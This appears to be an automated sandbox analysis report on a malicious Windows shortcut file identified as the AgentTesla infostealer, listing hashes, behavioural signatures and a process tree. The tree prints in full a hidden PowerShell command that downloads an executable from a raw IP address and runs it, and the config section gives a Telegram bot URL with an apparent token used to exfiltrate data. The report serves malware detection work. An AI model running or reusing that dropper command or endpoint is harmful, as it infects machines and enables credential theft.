Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2023 01:09
Static task
static1
Behavioral task
behavioral1
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Resource
win10v2004-20231127-en
General
-
Target
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
-
Size
1KB
-
MD5
92cff55b70b6556b395300de968521fc
-
SHA1
4bfccd1a6dc2a775a497074caecf25386dab49fb
-
SHA256
d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d
-
SHA512
7b59f385a7bacba7a87479837218f1399894480f2b4ae60811d0c4ec180cfbfde6170ecb0b369f4dd0cd75af02a216b5659e714d7c53d439394664505a9311fe
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot6184846740:AAFy48QnJEpbqT9DY_xx392kz1tH5_khlWo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 22 4876 powershell.exe 24 4876 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
newfile.exepid process 3744 newfile.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 50 api.ipify.org 51 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
newfile.exedescription pid process target process PID 3744 set thread context of 400 3744 newfile.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeRegAsm.exepid process 4876 powershell.exe 4876 powershell.exe 400 RegAsm.exe 400 RegAsm.exe 400 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exenewfile.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 3744 newfile.exe Token: SeDebugPrivilege 400 RegAsm.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exepowershell.exenewfile.exedescription pid process target process PID 2024 wrote to memory of 1732 2024 cmd.exe cmd.exe PID 2024 wrote to memory of 1732 2024 cmd.exe cmd.exe PID 1732 wrote to memory of 4876 1732 cmd.exe powershell.exe PID 1732 wrote to memory of 4876 1732 cmd.exe powershell.exe PID 4876 wrote to memory of 3744 4876 powershell.exe newfile.exe PID 4876 wrote to memory of 3744 4876 powershell.exe newfile.exe PID 4876 wrote to memory of 3744 4876 powershell.exe newfile.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe PID 3744 wrote to memory of 400 3744 newfile.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Users\Admin\AppData\Roaming\newfile.exe"C:\Users\Admin\AppData\Roaming\newfile.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd5⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:400
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD5716c27c08649ad5319ef1c41950c1c82
SHA1a6ea541cf0cbb41550dcde53b3da372f16c31652
SHA256f62640b8047a6105ba98ab690d7908f6c3e8aef22f05d6512e838457a01e0593
SHA512f7bcb38737514e0d335ea3d7db8a172e077ad00825740b4e54dedb42fcdc135456981ce2774c9b328809cb28a83b5efe9a281f40b641af1985ed3d2493b0b40e
-
Filesize
14KB
MD5716c27c08649ad5319ef1c41950c1c82
SHA1a6ea541cf0cbb41550dcde53b3da372f16c31652
SHA256f62640b8047a6105ba98ab690d7908f6c3e8aef22f05d6512e838457a01e0593
SHA512f7bcb38737514e0d335ea3d7db8a172e077ad00825740b4e54dedb42fcdc135456981ce2774c9b328809cb28a83b5efe9a281f40b641af1985ed3d2493b0b40e
-
Filesize
14KB
MD5716c27c08649ad5319ef1c41950c1c82
SHA1a6ea541cf0cbb41550dcde53b3da372f16c31652
SHA256f62640b8047a6105ba98ab690d7908f6c3e8aef22f05d6512e838457a01e0593
SHA512f7bcb38737514e0d335ea3d7db8a172e077ad00825740b4e54dedb42fcdc135456981ce2774c9b328809cb28a83b5efe9a281f40b641af1985ed3d2493b0b40e